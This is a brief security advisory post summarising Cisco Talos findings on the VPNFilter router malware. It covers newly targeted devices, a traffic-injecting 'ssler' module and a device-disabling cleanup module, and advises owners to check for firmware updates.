Cisco Talos Intelligence VPN Filter Findings & IOC Update
Recent discoveries regarding the VPNFilter malware have been made by Cisco Talos and various other intelligence partners. It has beend etermined that additional devices are being targeted. Some of these are vendors not previously seen on the target list.
Another discovery points to a new stage 3 module. This module injects malicious content into web traffic as it passes through deices. Additionally, this vector allows delivery of exploits via MitM or man-in-the-middle capability. The module is named “ssler” & additional info can be found here.
Final analysis of the malware shows yet another stage 3 module that when executed, removes traces of the VPNFilter malware and disables or renders the affected device unusable. Further analysis of this module can also be found here.
RB Groove (new)
RB Omnitik (new)
Other QNAP NAS devices running QTS software
PBE M5 (new)
Unknown Models* (new)
ZXHN H108N (new)
Security teams and research communities are currently still investigating the malware. Future updates to the list of vulnerable devices are possible. It is suspected that additional versions of this malware are present and that new devices may be targeted.
If you have an affected device from one of the above vendors, now is a good opportunity to check for model specific router updates. Check your manufacturer website for updates and instructions.
For more information and the latest news regarding the VPNFilter malware visit Talos Intelligence.